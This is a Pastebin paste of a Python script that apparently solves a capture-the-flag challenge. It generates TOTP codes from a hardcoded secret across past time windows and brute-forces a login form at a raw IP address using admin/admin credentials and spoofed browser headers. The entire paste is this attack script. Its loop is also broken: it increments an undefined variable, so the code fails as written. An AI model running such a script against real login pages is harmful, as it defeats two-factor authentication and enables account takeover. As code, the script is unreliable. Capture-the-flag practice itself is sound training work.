Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import sys
- import pyotp
- import requests
- from datetime import datetime, timedelta
- a = "3IXHPU54NDKVAaFdVXW6M2bCNWOeBGQeGDdcCaXA"
- totp = pyotp.TOTP(a)
- def gen_otps_for_time(base_time):
- times = [
- base_time - timedelta(seconds=30),
- base_time,
- base_time + timedelta(seconds=30)
- ]
- return [(time, totp.at(time.timestamp())) for time in times]
- def send_otps(username: str, password: str, n_months: int = 1):
- url = "http://45.164.23.212:3000/"
- headers = {
- "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
- "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8",
- "Accept-Language": "en-US,en;q=0.5",
- "Accept-Encoding": "gzip, deflate, br",
- "Referer": "http://45.164.23.212:3000/",
- "Content-Type": "application/x-www-form-urlencoded",
- "Origin": "http://45.164.23.212:3000",
- "Dnt": "1",
- "Upgrade-Insecure-Requests": "1",
- "Priority": "u=0, i",
- }
- current_time = datetime.now()
- months_ago = current_time - timedelta(days=30 * n_months)
- while months_ago <= current_time:
- otps = gen_otps_for_time(months_ago)
- for time, otp in otps[::-1]:
- data = f"username={username}&password={password}&totp={otp}"
- response = requests.post(url, data=data, headers=headers)
- if "2FA code is incorrect" in response.text:
- print(f"!!!!!!!!! diff response for OTP: {otp} at time: {time} !!!!!!!!!!")
- print(f"\tflag http: {response.text}")
- # break
- else:
- print(f"request OTP: {otp} at: {time}, response: {response.text}")
- one_month_ago += timedelta(days=1)
- if __name__ == '__main__':
- #flagmx{time_based_pass_r_not_realy_random}
- try:
- n = int(sys.argv[1])
- except IndexError as e:
- n = 1
- finally:
- send_otps("admin", "admin", n_months=n)
- sys.exit(0)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
